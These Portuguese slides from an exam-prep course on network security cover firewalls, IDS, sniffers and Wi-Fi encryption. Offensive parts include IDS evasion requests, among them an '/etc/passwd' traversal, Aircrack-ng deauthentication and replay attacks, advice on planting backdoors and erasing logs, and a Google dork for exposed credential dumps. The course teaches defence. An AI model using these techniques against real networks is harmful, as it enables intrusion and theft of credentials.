Curso Multiplus Preparatório para prova da Polícia Federal Segurança em redes de Computadores Prof. Marcelo Ribeiro mribeirobr (at) globo (dot) com www.mribeirobr.com
Sumário Abordaremos os seguintes tópicos do Edital 8 - Segurança de redes de computadores 8.11 Firewall, sistemas 8. sis temas de deteção de intrusão(IDS), antivírus, an tivírus, NAT, VPN 8.2 Monitoramento e análise de tráfego; Uso de Sniffers; Traffic Shaping 8.3 Tráfego de serviços e programas usados na internet 8.4 Segurança de redes sem fio: EAP, WEP, WPA, WPA2 8.5 Ataques em redes de computadores
Sumário Abordaremos os seguintes tópicos do Edital 8 - Segurança de redes de computadores 8.11 Firewall, sistemas 8. sis temas de deteção de intrusão(IDS), antivírus, an tivírus, NAT, VPN 8.2 Monitoramento e análise de tráfego; Uso de Sniffers; Traffic Shaping 8.3 Tráfego de serviços e programas usados na internet 8.4 Segurança de redes sem fio: EAP, WEP, WPA, WPA2 8.5 Ataques em redes de computadores
Metodologia Apresentaremos conceitos e alguns exem exemplos plos práticos Tambem serão apresentadas Tambem apresentadas questões de provas provas anteriores e questões de provas de certificações de Ethical hacking
Segurança em redes - Conceitos Princípios Básicos Confidencialidade: Certeza que somente as pessoas autorizadas a acessar os dados podem acessá-los
Integridade: Certeza que os dados não foram alterados - por acidente ou intencionalmente
Disponibilidade: Certeza que os dados estão acessíveis quando e onde forem necessários
Irretratabilidade:
informação
Impossibilidade em negar ser origem de uma
Segurança - Conceitos Básicos Elementos Utilizados para Garantir a Confidencialidade Criptografia dos dados Controle de acesso Elementos para garantir a Integridade Assinatura digital MD5- hash Elementos para garantir a Disponibilidade Backup Tolerância a falhas Redundância Elementos para garantir a Irretratabilidade Assinatura digital
Segurança em redes Perímetro Fronteira fortificada da sua rede de dados Deve incluir alguns elementos de proteção
Elementos de um Perímetro Firewall VPN Zona Desmilitarizada (DMZ) Host Hardening Intrusion Detection System (IDS) Intrusion Prevention System (IPS) Network Address Translation (NAT) Analisadores de Conteúdo Analisadores de Logs Security Information and Event Management (SIEM)
Elementos de um perímetro Dispositivo (hardware + software) que possui regras específicas que permitem ou bloqueiam o tráfico Barreiras de segurança entre a intranet e a Internet para proteger a rede interna contra acessos não autorizados Mensagens que entram ou saem da rede devem ser examinadas pelo firewall, que toma ações de acordo com critérios de segurança especificados
Elementos de um perímetro Tipos: Estático: Filtro de pacotes Stateful: memoriza as conexões para uma melhor análise Proxy de Aplicação
Elementos de um perímetro Firewall tipo filtro de pacotes Cliente
Servidor Web
HTTP Outros Protocolos
Elementos de um perímetro Firewall tipo filtro de pacotes LAN Endereço/Serviço Autorizado
LAN
Internet
Firewall
LAN
Endereço/Serviço não Autorizado
Elementos de um perímetro Exemplo de regra de firewall filtro de pacotes access-list 102 permit tcp 192.168.100.200 0.0.0.0 eq 25 Essa regra, de número 102, permite o IP 192.168.100.200 sair para qualquer endereço (0.0.0.0) na porta 25/TCP (SMTP).
Elementos de um perímetro Filtro de pacotes - Vantagens Fácil de implementar Praticamente qualquer ativo de rede permite a criação de um Filtro de pacote - Desvantagens Facilmente burlável através de técnicas de IP Spoofing Atua apenas na camada 3 do modelo OSI
Elementos de um perímetro O ataque de IP Spoofing consiste em enganar o Firewall, mudando a origem do pacote, para uma origem conhecida pelo Firewall e autorizada por ele. Normalmente usa-se os ednereços da rede interna (os quais, normalmente, são confiáveis para o Firewall) O Anti-Spoofing é um conjunto de regras que impede que pacotes com endereço das redes internas venham de interfaces externas.
Elementos de um perímetro Proxy de aplicação
Proxy Cache
Web Server
O que é? Procurador Atua no nível da aplicação- orientado a aplicação Geralmente, o cliente precisa ser modificado- não é transparente Funciona como acelerador - cache
Elementos de um perímetro Proxy de Aplicação
Proxy Cache
Por que usar? Autenticação de usuário Autenticação Inspeção de Conteúdo Cache Registro de Acessos Esconde detalhes da rede interna
Web Server
Elementos de um perímetro Proxy de aplicação Verifica … User autorizado?
3
Protocolo permitido? Destino autorizado?
6
5
1 2
4 Proxy
Web Server
Elementos de um perímetro Proxy de aplicação Internet
4 2 5 3
LAN1
LAN2 Matriz
1 6
Elementos de um perímetro Proxy reverso Verifica … Request é permitido? Protocolo permitido? Destino permitido?
Web Server
3
DNS Server
4 5
2
Proxy R
1
6
Elementos de um perímetro Firewall Statefull Inspection Tambem conhecido como Filtro de pacotes dinâmico Consegue atuar nas 7 camadas do modelo OSI pois consegue reconhecer cada protocolo (não apenas abre as portas, mas entende o protocolo em si), podendo interpretar um ataque sobre o protocolo.
Elementos de um perímetro Firewall Statefull inspection Vantagens O mais seguro atualmente por conseguir reconhecer ataques semânticos Desvantagens Mais complexo de implementar e administrar Necessita estar sempre atualizado para manter seu nível de segurança.
Elementos de um perímetro VPN - Virtual Private Network Esta técnica consiste em encapsular um pacote, não cifrado, em um outro que está cifrado por uma chave de sessão. O outro parceiro da comunicação será capaz em remover o pacote original do encapsulamento e estabelecer a comunicação com o pacote restaurado.
Elementos de um perímetro Site central
ISDN Cable DSL
Site Usuário remoto
Server
Internet
Remoto
Site Remoto
Elementos de um perímetro Classificação de VPN Por tipo Remote access Site-to-Site Por tecnologia IPSEC SSL
Elementos de um perímetro DMZ - Demilitarized Zone Rede separada, na qual são hospedados servidores ou serviços a serem disponibilizados externamente. Objetiva separar os serviços externos da rede interna da empresa ou mesmo separar serviços mais críticos/ vulneráveis de redes mais sensíveis.
Elementos de um perímetro Cliente
Servidor Web
Intranet
Internet
Firewall
Elementos de um perímetro INTRANET Parceiro1
Parceiro2
Parceiro3
LAN1
LAN2
VPN
LAN3 Firewall/ Proxy LAN4
Firewall
Router B
FILIAL
DMZ Hardened Server
LAN5 DNS Server Mail Server
Internet
WEB Server
Proxy R.
Elementos de um perímetro Sistemas de deteção de intrusão (IDS - Intrusion Detection System) Utilizado para detectar e alertar eventos maliciosos Antecipar possíveis invasões aos sistemas O sistema de defesa deverá dispor de vários agentes IDS pela rede Normalmente verifica assinaturas pré-definidas e eventos maliciosos Podem ser de rede (NIDS) ou de host (HIDS)
Elementos de um perímetro
Elementos de um Perímetro HIDS Esse tipo de IDS reside em um único “host” e monitora atividades específicas do mesmo Pode ser baseado em assinaturas Verifica a integridade dos arquivos do SO Monitora utilização de recursos do host
Elementos de um perímetro HIDS - O que ele monitora? Exemplos de componentes monitorados Memória Arquivos executáveis Espaço em disco Kernel
Elementos de um perímetro NIDS Monitora todo o tráfego da rede e compara este a um banco de dados com assinaturas de ataque Quando uma assinatura é detectada um evento é disparado pelo IDS Sistema utilizado para detectar e/ou reagir a uma assinatura de ataque na rede Utilizado para analisar o tráfego de rede em tempo real Equipamento dedicado com processamento compatível com o tamanho da infra-estrutura
Elementos de um perímetro NIDS Sensor de Rede
Posicionamento em função do conhecimento da topologia Em ambientes com switch - Espelhamento de porta Configuração stealth recomendada - Interface de captura sem endereçamento e capturando tráfego de rede em modo promíscuo
Elementos de um perímetro Sistema de prevenção de intrusão - IPS (Intrusion Prevention System) Funciona de forma análoga ao IDS, mas além de alertar sobre os ataques ele é capaz em bloquear os mesmos, através de interações com outros dispositivos na rede (Firewalls, roteadores, switches, dentre outros) Pode ser usado em modo “Learning”, no qual atuará como um IDS
Elementos de um perímetro Principais problemas dos IPS/IDS Dependem fortemente das assinaturas de ataques estarem atualizadas (semelhante aos anti-vírus) Se houver um ataque dentro de uma VPN ou contra um servidor WEB com SSL habilitado ele será incapaz em detectar o ataque, face a criptografia * Complexos de implementar * A menos que seja um IPS recente, no qual é possível instalar as chaves de sessão de criptografia no mesmo, possibilitando a leitura do trafego anteriormente cifrado e sua análise.
Elemento de um perímetro Terminologia comum com IDS/IPS Falso Positivo - A detecão de uma atividade normal, mas interpretada como uma atividade maliciosa. Ocorre normalmente pela configuração não ajustada do dispositivo de detecção. Pode ser atribuida a uma configuração “segura” demais ou ao comportamento pouco convencional de alguns protocolos Falso Negativo - A interpretação de um evento malicioso como sendo uma atividade normal, não gerando nenhum tipo de aviso ao administrador do sistema. Normalmente ocorre com um dispositivo configurado para ser permissivo (por falha de configuração ou para permitir determinada aplicação funcionar)
Elementos de um perímetro Funcionamento de um IDS Tecnologia complementar ao firewall Realiza inspeção profunda em pacotes de rede (DPI) Tecnologia Reativa – detection (ataque pode ser simples pacote)
Elementos de um perímetro O que IDS procuram? Tentativa de Intrusão Denial of Service Atividade Suspeita Anomalia em Protocolos Anomalia Estatistica
Elementos de um perímetro Modelos Baseado em assinaturas Baseado em detecção de anomalias Estratégias de monitoramento Tipos Network Based Host Based
Elementos de um perímetro IDS baseado em assinaturas - funcionamento Análise por Pacote - procura assinaturas de ataque individualmente, em cada pacote. Não detecta ACK scans lentos. Não consegue verificar a relação entre pacotes associados. Ex. Shadow, RealSecure. Statefull - Adiciona a capacidade de procurar por assinaturas na sessão. Entende fragmentação de pacotes e Identifica ataques em múltiplos pacotes, pois verifica o estado das comunicações e a remontagem dos pacotes. Ex. Loki (icmp e UDP53) – “Covert comunication Channel”. Ex. Network Flight Recorder, DragonIDS. Snort e CSIDS (estáticos com caract. Statefull). Protocol Decode-Based - verificação é feita no nível da aplicação. Ex. HTTP e SMTP. Utilizados para prevencão de ataques a aplicações específicas. Heuristic Analysis-Based - processo de analisar o tráfego de forma estatística. Caracteriza o tráfego. Quantas portas estão sendo abertas por um único host, por minuto? Quantos sistemas estão conectados a um único host? Quantas conexões por segundo estão sendo utlizadas? Método utilizado para detectar port scan.
Elementos de um perímetro IDS baseados em assinaturas: Vantagens e desvantagens Vantagens Baixa rate de alarmes falsos, comparado com outros tipos de IDS. Regras padronizadas e de fácil entendimento. As regras do IDS snort são simples e de fácil entendimento. Podem ser editadas e até mesmo criadas a partir do conhecimento do modus operandi de um exploit. Desvantagens Uso intenso de recursos pois pode verificar os pacotes nas camadas mais altas. O custo da abertura integral dos pacotes da rede pode ser bastante intenso, em termos de processamento e uso de memória. A base de dados de assinaturas de ataques necessita de manutenção e updates contínuos, tendo em vista que novos ataques surgem a cada dia. Caso as atualizações não sejam efetuadas o sensor não irá alertar para um novo ataque. Esses ataques não serão detectados até que suas assinaturas sejam atualizadas ou criadas manualmente no IDS.
Elementos de um perímetro IDS baseado em anomalia Aprende a rede Fronteira entre normal e anormal é tenue
Elementos de um perímetro IDS baseado em anomalia Vantagens Dinamicamente adaptável a novos ataques, pois aprende a conhecer o comportamento da rede e alerta para qualquer nova atividade. Simples de se implementar. Não há muito o que configurar, bastando colocá-lo para aprender e depois torná-lo funcional. Desvantagens Alta rate de alarmes falsos. Nem tudo é aprendido pelo IDS. Novas situações ocorrem a cada momento. Atividade dos usuários e comportamento do sistema pode não ser estático o suficiente para ser implementado de forma efetiva. Configurações em uma rede local mudam o tempo todo.
Elementos de um perímetro Estratégias de monitoramento Host - Fonte de dados: interna ao sistema. Geralmente logs do sistema (Ex.Windows event logs e Linux Syslog. Restrito a eventos do sistema operacional. Pode monitorar system calls, memória, processos etc. Ex. Cisco Security Agent. Monitoramento de Rede - Fonte de dados: pacotes de rede. Dispositivos de rede em modo promíscuo. Esse tipo pode ser afetado pela arquitetura da rede. Ex. redes com switches necessitam de algumas adaptações. Além disso, não é restrito a tráfego destinado a um único host Ex. Cisco IDS, Snort, Shadow. Monitoramento de Aplicacao - Fonte de dados: aplicação em uso: logs de eventos da aplicação. Possiveis aplicações: Web servers - IIS, Apache etc. Mail servers – Sendmail, Exchange etc. Ex. Cisco Security Agent e ISS RealSecure – analisa logs, verifica assinaturas e entende aplicações Web –IIS e Apache. Monitoramento de alvo - focado em um sistema. Monitora o estado de um objeto e utiliza criptografia – funções de hash. Detecta alterações no sistema, mas não envia alertas em tempo real. Ex. Alterações nos arquivos cmd.exe, /sbin/ps, ls etc. Ex. Tripwire e Advance Intrusion Detection Engine (AIDE).
Elementos de um perímetro IDS/IPS - Técnicas de evasão Method Matching URL Encoding Duble Slashes Self-Reference Directories Flooding de alertas Fragmentação
Elementos de um perímetro Method Matching Substituição GET /cgi-bin/example.cgi HTTP/1.0 por HEAD /cgi-bin/example.cgi HTTP/1.0 URL Encoding http permite URL utilizando notação %xx, onde xx é o valor hex do caracter cgi-bin = %63%67%69%2d%62%69%6e get /%63%67%69%2d%62%69%6e/exemple.cgi HTTP/1.0 Double Slashes Substitui / por // Self-Reference Directories Adiciona /./ na URL para confundir o sensor
Elementos de um perímetro Técnicas de evasão (cont.) Flooding de alertas Atacante utiliza ferramentas para confundir o sensor inundando o mesmo com pacotes que simulam assinaturas de ataque. Sensor perde pacotes (flooding) ou o ADM fica confuso com tantos alertas (o ataque não é visualizado). Ferramentas: Stick e Snot - “IDS Killers”, baseados nas assinaturas do snort. Nmap –D “decoy”.
Elementos de um perímetro Técnicas de evasão (cont.) Fragmentação Utilizada em todas as fases do ataque Remontagem no destino confunde o sensor Tipos de fragmentação get …./etc/passwd
Elementos de um perímetro Fragmentação (cont.) Diferentes S.O remontam fragmentos de forma diferente. Não existe padronização para a remontagem. O sensor, não necessariamente sabe o método de remontagem que será utilizado (fica confuso). Snort com frag2 sempre remonta como Linux. Snort com frag3 tem múltiplos buffers de remontagem. CSIDS tem setagem para escolher manualmente – só pode remontar de uma forma e com isso só identifica ataques fragmentados em um único Sistema Operacional. Ferramentas de attaque para fragmentação Nmap – tiny fragment attack. Fragrouter. FragRoute.
Elementos de um perímetro NAT - Network Address Translation Técnica utilizada por um dispositivo para a tradução de endereços IP Permite que uma rede use um conjunto de endereços IP particulares para tráfego interno Converte os endereços IP particulares em endereços IP públicos Aumenta a segurança ocultando endereços IP Internos Permite que uma organização economize endereços IP públicos Pode ser classificado em: Estático (ou 1 para 1) - Onde um endereço público é traduzido para um interno Dinâmico (ou 1 para muitos) - Onde um endereço público pode ser traduzido para vários internos. O controle disso se dá através de uma tabela, no dispositivo que controla o NAT, associando cada conexão a um Source Port)
Elementos de um perímetro 131.107.0.9 131.107.0.9 10.10.10.6
10.10.10.10 10.10.10.7
Tabela NAT 10.10.10.0 mapeia para 131.107.0.9
Elementos de um perímetro Anti-vírus Software, comumente instalado nos hosts da rede, que tem como função buscar uma ameaça (malware) em um arquivo no computador. Esta análise se dá através de comparação com um banco de assinaturas de malwares disponibilizada pelo fabricante Pode usar uma análise herústica, que possibilita a detecção de malwares não conhecidos pelo fabricante, assim como também pode gerar grande número de falsos positivos.
Elementos de um perímetro Anti-vírus (cont.) O que acontece se criarmos um arquivo texto em um computador com anti-vírus e digitamos as linhas abaixo? X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARDANTIVIRUS-TEST-FILE!$H+H*
Monitoramento e análise de tráfego A tarefa de análise de tráfego de rede é executada, comumente, com o uso de uma ferramenta chamada Sniffer. Esta ferramenta funciona lendo o tráfego de rede que chega até a interface de rede do computador utilizado para a análise Em face do Sniffer apenas poder análisar o tráfego que passa pela sua interface de rede faz-se necessário que TODO o tráfego da rede chege a interface. Conseguimos isso colocando a interface de rede no chamado “modo promíscuo”
Monitoramento e análise de tráfego Modo promíscuo Faz com que a placa da rede responda a todos os pacotes que circulam pela rede, independente se estes foram destinados aquela interface ou não Consegue-se esse efeito respondendo a todos os pacotes de broadcast que circulam na rede, dando a impressão que todos os pacotes são para aquele host.
Monitoramento e análise de tráfego Sniffer Contudo os pacotes ainda precisam ser acessíveis pela porta Em uma rede com “Hubs” isso faz parte do modo de funcionamento normal da rede, pois TODAS AS PORTAS RECEBEM TODOS OS PACOTES (também chamado de “Passive Sniffing”) Em uma rede com switches isso não acontece, pois O SWITCH REDIRECIONA O PACOTE PARA A PORTA CORRETA, EM CONFORMIDADE COM O SRC ADDRESS DO PACOTE Como usar Sniffers em redes com switches?
Monitoramento e análise de tráfego Sniffer (cont.) Switch Monitor port (Ou SPAN port) Porta especial, configurável em um switch gerenciável, que recebe uma cópia de cada pacote que circula naquele switch, independente de ser a porta correta para aquele pacote Serve apenas para monitoramento de rede. Também chamado de “Active Sniffing” Em equipamentos da Cisco a porta de monitoramento chama-se SPAN (Switched Port Analyser) Vale salientar que esta dificuldade sobre a porta vale também para dispositivos como IDS e IPS pois, em essência, funcionam de forma análoga a um Sniffer.
Monitoramento e análise de tráfego Protocolos interessantes para se monitorar com um sniffer Telnet e RLOGIN - Transmitem usuário e senha em claro na rede HTTP - Todo o tráfego segue em claro SMTP, NNTP, POP, FTP, IMAP - Senhas e dados seguem em claro
Monitoramento e análise de tráfego Ferramenta: Wireshark Popular sniffer, open source, sendo praticamente ferramenta padrão deste tipo.
Monitoramento e análise de tráfego
Monitoramento e análise de tráfego O que um sniffer não pode ver em uma rede? Tráfego criptografado Tráfego que não passe pela sua interface (a menos que seja feito um ataque para desviar a rota)
Monitoramento e análise de tráfego TCP Dump Ferramenta para debugging de rede, na qual diversas outras são baseadas (o IDS Snort, por exemplo) Usa a biblioteca Libpcap, também usada pelo Wireshark Não é tão amigável quanto o Wireshark, mas é mais prático em algumas situações
Monitoramento e análise de tráfego TCP Dump
Monitoramento e análise de tráfego
Exemplos práticos com o Wireshark
Monitoramento e análise de tráfego Traffic Shapping Técnica que prioriza tráfego, de acordo com algumas políticas e regras, para otimizar o uso de largura de banda disponível no link Muito utilizado como técnica de QoS (quality of service) Pode priorizar usando as seguintes políticas Por tipo de serviço Por rede Por peso de protocolo e conexão (WRR - Weighted round robin) Muito utilizado em provedores de internet para controle de protocolos que reconhecidamente cogestionam uma rede (P2P por exemplo)
Segurança em redes sem fio Redes sem fio (Wireless) estão cada vez mais presentes em nosso dia a dia, mas face a simplicidade em se colocar uma delas em funcionamento comumente estão inseguras. É muito comum encontrar redes sem fio, sem senha, até mesmo no centro do RJ
Segurança em redes sem fio
Segurança em redes sem fio
Segurança em redes sem fio Padrões Banda de até 54 Mbps e atua na faixa de frequencia de 5 Ghz Banda de até 11 Mbps e atua na faixa de frequencia de 2,4 Ghz Banda de até 54 Mbps e atua na faixa de frequencia de 2,4 Ghz Um padrão para WLAN que prove melhor criptografia para redes 802.11a,b e g Novo padrão 802.11 que suporta banda de 100Mbps + Grupo de padrões para Wireless MAN (Metropolitan Area Networks) Suporta transferencias a baixa velocidade (1-3 mbps) e baixo alcance (˜10 metros), desenvolvido para dispositivos móveis
Segurança em redes sem fio Service Set Identifier (SSID) É um token para idenficar uma rede 802.11. É parte do cabeçalho dos pacotes 802.11 Funciona como um identificador único compartilhado entre o AP e os clientes Se alterado no AP precisa ser mudado em TODOS os clientes Clientes podem se conectar a um SSID “none” ou “any”, que é uma configuração não segura.
Segurança em redes sem fio Modo de autenticação Open Authentication Process
Segurança em redes sem fio Modo de autenticação com Shared Key
Segurança em redes sem fio Importante lembrar que uma rede sem fio funciona como um HUB. Todos os AP de uma rede recebem todos os pacotes da rede Mesmo os AP que não fazem parte da rede ainda podem receber os pacotes, pois os mesmo trafégam “over the air”, sem controle Caso a rede possua uma senha estes pacotes estarão criptografados. Dependendo do algorítmo de criptografia as informações poderão ser acessadas em 10 minutos ou alguns anos...
Segurança em redes sem fio EAP - Extensible Authentication Protocol Padrão IEEE (RFC 5247) Permite multiplos meios de autenticação, como certificados, tokens, kerberos ... LEAP - Lightweight EAP - Versão proprietária da Cisco deste protocolo
Segurança em redes sem fio WEP (Wired Equivalency Protocol) Padrão original de criptografia para redes sem fio Facilmente quebrável (não segura) Utiliza vetores de inicialização (IV) de 24-bits, que compõem uma cifra RC-4 para confidecialidade das comunicações. Cada IV no WEP possui 24 bits, facilitando o processo de “quebra”
Segurança em redes sem fio WEP (cont.) Usa CRC32 para integridade, que é insuficiente para garantir a integridade criptográfica do pacote. Como cada IV tem 24 bits seria possível prever todos os IV em um AP, transmitindo pacotes de 1500 bytes a 11 Mb/s em 5 horas Com um grande número de IV coletados é possível descobrir a chave secreta da rede Por ser baseado em senhas pode ser alvo de ataques de dicionário Mensagens de associação e disassociação de um host na rede não são autenticados, permitindo que derrubemos alguém da rede mesmo sem estar na rede
Segurança em redes sem fio WPA (Wi-fi protected Access) Evolução do WEP, que resolve alguns dos problemas mais críticos deste. IV’s de 48 bits ao invés de 24 bits Uso mais raro de chaves compartilhadas e implementação de chaves temporárias para cifragem de pacotes (protoco TKIP - Temporal Key Integrity Protocol) É possível injetar pacotes na rede para causar um Denial Of Service (DoS) Suceptível a ataques de dicionário
Segurança em redes sem fio Wi-fi Protected Access 2 (WPA2) Atualmente o mais seguro dos mecanismos de criptografia e autenticação para redes sem fio Basicamente é suceptível apenas a ataques de dicionário, que podem ser demorar muito tempo para completar
Segurança em redes sem fio
Segurança em redes sem fio Ataques ao controle de acesso War Driving Rogue Access Points Mac Spoofing Associações AD Hoc AP mal configurados Clients mal configurados Associação não-autorizada Promiscuous client
Segurança em redes sem fio Ataques à integridade Injeção de quadro de dados WEP Injection Data Replay Initialization Vector Replay Attacks
Segurança em redes sem fio Ataques à confidencialidade Honeypot Access Point Traffic Analysis Evil Twin AP Man-in-the-middle (MITM) Quebra de chave WEP
Segurança em redes sem fio Ataques à disponibilidade Roubo de AP DoS Beacon Flood Autenticate Flood Disassociation Flood De-Authenticate Flood
Segurança em redes sem fio Rogue access point attack
Segurança em redes sem fio Client Mis-association
Segurança em redes sem fio Unauthorized Association
Segurança em redes sem fio Honeyspot Access Point Attack
Segurança em redes sem fio
Segurança em redes sem fio Denial of Service attack
Segurança em redes sem fio Entendendo um pacote 802.11
Segurança em redes sem fio Pacote 802.11 Protocol Version - Indica a versão do do protocolo 802.11 usado. Valor atualmente é 0 Type e SubType - Determina a função do frame, podendo ser : Control - Valor 1 Dados - Valor 2 Gerenciamento - Valor 0 To DS e From DS - Indica se o frame está vindo ou indo para o DS (Distribution System ou, na terminologia de rede sem fio, rede cabeada (Ethernet)) More fragments - Indica se há mais fragmentos nos frams que seguirão este Retry - Indica se o frame está sendo retransmitido
Segurança em redes sem fio Pacote 802.11 (cont.) Power Management - Indica se o STA está em modo ativo (valor 0) ou em power-save (valor 1) More Data - Indica para o STA, em power save mode, que o AP tem mais quadros para enviar. WEP - Indica se há, ou não, criptografia no quadro analisado Order - Indica ser o pacote está sendo enviado usando uma classe de serviço estritamente ordenada. Não utilizada atualmente.
Segurança em redes sem fio Pacote 802.11 (cont.) Sequence Control Sequence number (12 bits) - Indica a o número de sequencia de cada quadro. Varia de 0-4095 Fragment Number (4 bits) - Indica o número de cada fragmento de um quadro enviado.
Segurança em redes sem fio Pacote 802.11 (Cont.) Data Pode ter até 2324 bytes de dados. O MSDU (Mac Service Data Unit) no padrão IEEE 802.11 é 2304 Bytes. Há algum overhead quando usa-se criptografia: WEP: 8 bytes -> 2312 Bytes total TKIP (WPA1): 20 Bytes -> 2324 Bytes total CCMP(WPA2): 16 Bytes -> 2320 Bytes total
Segurança em redes sem fio Atacando uma rede sem fio Primeiramente é necessário ter uma placa de rede com um driver que permita a placa entrar no chamado “modo promíscuo”, semelhante ao que acontece com o uso de sniffers em redes cabeadas Contudo nem todas as placas possuem um driver com esta função, pois não é comum o fabricante da placa de rede “bloquear” esta função em seus drivers originais Contudo é possível encontrar uma uma relação de placas com drivers que suportam o modo promíscuo no link http://www.aircrack-ng.org/doku.php? id=compatibility_drivers#which_is_the_best_card_to_buy
Segurança em redes sem fio Para fazer os ataques existe um framework conhecido chamado Aircrack-NG Este software está instalado, por padrão, na distribuição Linux para testes de invasão “Backtrack” e “Kali Linux” Existem versões para Windows, mas é mais comumente usada em Linux
Segurança em redes sem fio Ferramentas do Aircrack-NG Airmon-ng Utilizado para habilitar o modo monitor(promíscuo) nas interfaces de rede sem fio Sintaxe: airmon-ng interface [channel]
Segurança em redes sem fio Ferramentas do Aircrack-NG (cont.) Airdump-NG Ferramenta utilizada para capturar dados brutos 802.11 e, particularmente, coletar IV’s WEP para uso posterior com o Aircrack-NG Se houver um receptor de GPS plugado e compatível o Airdump-NG poderá mostrar as coordenadas geográficas dos AP ou clientes encontrados
Segurança em redes sem fio Ferramentas Aircrack-NG (cont.) Exemplo de saída do Airdump-NG CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR 00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP bigbear 00:14:6C:7E:40:80 32 100 752 73 2 9 54 WPA TKIP PSK teddy BSSID STATION PWR Lost Packets Probes 00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14 (not associated) 00:14:A4:3F:8D:13 19 0 4 mossy 00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 0 5 00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 99 teddy
Segurança em redes sem fio Ferramentas do Aircrack-NG (cont.) Airdump-NG Informações importantes BSSID - Endereço MAC do AP PWR - Nível de sinal reportado pela placa de rede. Quanto mais alto, mais próximo do AP ou da estação. Se o BSSID PWR é -1 então o driver não suporta report de nível de sinal. Se PWR é -1 para um número restrito de estações então este pacote veio do AP mas está indo para uma estação que está fora do alcance de nossa placa de rede. Se todos os clientes tiverem PWR -1 então o driver não suporta report de nível de sinal.
Segurança em redes sem fio Ferramentas do Aircrack-NG (cont.) Airdump-NG Informações importantes RXQ - Qualidade de recepção, que é medido pela porcentagem de pacotes (de gerenciamento e dados) que foram recebidos com sucesso nos últimos 10 segundos BEACONS - Número de pacotes de anúncios enviados pelo AP. Cada AP envia em torno de 10 beacons por segundo. #Data - Número de pacotes de dados capturados (se WEP, aponta o número de IV não repetidos), incluindo pacotes de broadcast #/s - Número de pacotes de dados por segundo, medidos nos últimos 10 segundos. CH - Número do canal (obtido dos pacotes de anúncio)
Segurança em redes sem fio Ferramentas do Aircrack-NG (cont.) Airdump-NG Informações importantes MB - Velocidade máxima suportada pelo AP. Se MB=11 então 802.11b, se MB = 22 então 802.11b +. E taxas mais altas de 802.11g ENC - Algoritimo de criptografia em uso. OPN= Sem criptografia. WEP?= WEP ou superior (indefinido), WEP=WEP, WPA=WPA, WPA2=WPA2 CIPHER - Cifra detectada (CCMP, WRAP, TKIP, WEP, WEP40 ou WEP104) AUTH - Tipo de autenticação (MGT=servidor de autenticação externo, SKA=Chave compartilhada para WEP, PSK=Chave compartilhada para WPA/WPA2 ou OPN=Aberta para WEP)
Segurança em redes sem fio Ferramentas do Aircrack-NG (cont.) Airdump-NG Informações importantes ESSID - Mostra o SSID. Se vazio o Airdump-NG tentará obter esta informação dos pacotes capturados STATION - Endereço MAC das estações detectadas LOST -Número dos pacotes perdidos nos últimos 10 segundos, baseado no número de sequencia. PACKETS - Número de pacotes de dados enviados pelo cliente PROBES - O SSID procurado pelo cliente
Segurança em redes sem fio Ferramentas do Aircrack-NG Aireplay-NG Usado para gerar ou acelerar o tráfego para uso posterior com o Aircrack-NG Suporta diversos tipos de ataques
Segurança em redes sem fio Ferramentas do Aircrack-NG Aireplay-NG - Ataques suportados Ataque 0 - Deauthentication Ataque 1 - Fake authentication Ataque 2 - Interactive packet replay Ataque 3 - ARP request replay attack Ataque 4 - KoreK chopchop attack Ataque 5 - Fragmentation attack Ataque 9 - Injection test
Segurança em redes sem fio Ferramentas do Aircrack-NG Aireplay-NG - Ataques De-athentication attack Ataque número “0” do Aireplay Força um cliente específico (ou todos, se não informarmos o MAC de um cliente) a se desconectar de uma rede sem fio e fazer nova autenticação.
Segurança em redes sem fio Ferramentas do Aircrack-NG Aireplay-NG - Ataques Fake Authentication Permite que vc faça dois tipos de autenticação WEP (Open system e chave compartilhada) e faça uma associação a um AP. Este ataque é útil quando não há clientes associados a rede.
Segurança em redes sem fio Ferramentas do Aircrack-NG Aireplay-NG - Ataques Interactive Packet Replay Permite que um pacote seja re-inserido na rede (replayed), podendo gerar efeitos vantajosos ao atacante (como o aumento de vetores de inicialização)
Segurança em redes sem fio Ferramentas do Aircrack-NG Aireplay-NG - Ataques ARP Request Replay Semelhante ao Packet Replay, mas focado em ARP request. Também possui foco em aumentar a geração de initialization vectors
Segurança em redes sem fio Ferramentas do Aircrack-NG Aireplay-NG - Ataques Korek ChoChop Attack Permite decifrar dados de uma rede WEP sem conhecer a chave Não dá acesso a chave em si Alguns AP não são vulneráveis ao ataque
Segurança em redes sem fio Ferramentas do Aircrack-NG Aireplay-NG - Ataques Fragmentation Attack Utilizado para obter o PRGA (Pseudo Random Generation Algorithm) dos pacotes PRGA pode ser usado pelo packetforge-NG para gerar pacotes forjados dentro de uma rede sem fio
Segurança em redes sem fio Ferramentas do Aircrack-NG Aircrack-NG Ferramenta para quebra de chaves WEP e WPA/PSK
Ataques em redes de computadores Metodologia de ataque Todo ataque é dividido em fases e estas não possuem um prazo exato para terminar. Podem durar alguns meses até anos, dependendo do alvo. As fases são Reconhecimento, Obtendo acesso, mantendo acesso e limpando os traços.
Ataques em redes de computadores Obtendo acesso Nesta fase são exploradas as vulnerabilidades e fraquezas encontradas na fase anterior, visando obter acesso ao alvo Uso de exploits contra servidores vulneráveis, uso de informações encontradas no google para invadir um servidor Web, engenharia social contra alvos préselecionados, dentre outras atividades.
Ataques em redes de computadores Mantendo acesso Após obter acesso desejamos manter este acesso, em caso do administrador descobrir a vulnerabilidade e remover esta. Nesta fase são instalados backdoors, rootkits e qualquer código que permita um acesso posterior.
Ataques em redes de computadores Limpando os traços Nesta fase elimina-se, dentro do possível, os traços da presença do hacker no sistema invadido. Logs comumente são apagados, códigos inseridos são ocultados, dentre outras tarefas.
Ataques em redes de computadores Atividades Google Hacking Técnica que utiliza o Google para localizar servidores WEB vulneráveis ou até mesmo com backdoors ativos Muito utilizado por hackers Exemplo: Ao fazer uma pesquisa por allinurl:auth_user_file.txt no google encontramos uma lista de URLs com dump de MYSql server na internet, com livre acesso. Nesses dumps podemos encontrar credenciais de acesso que ainda podem ser válidas. Para esta função o Google dispõe de diversos operadores que auxiliam na tarefa.
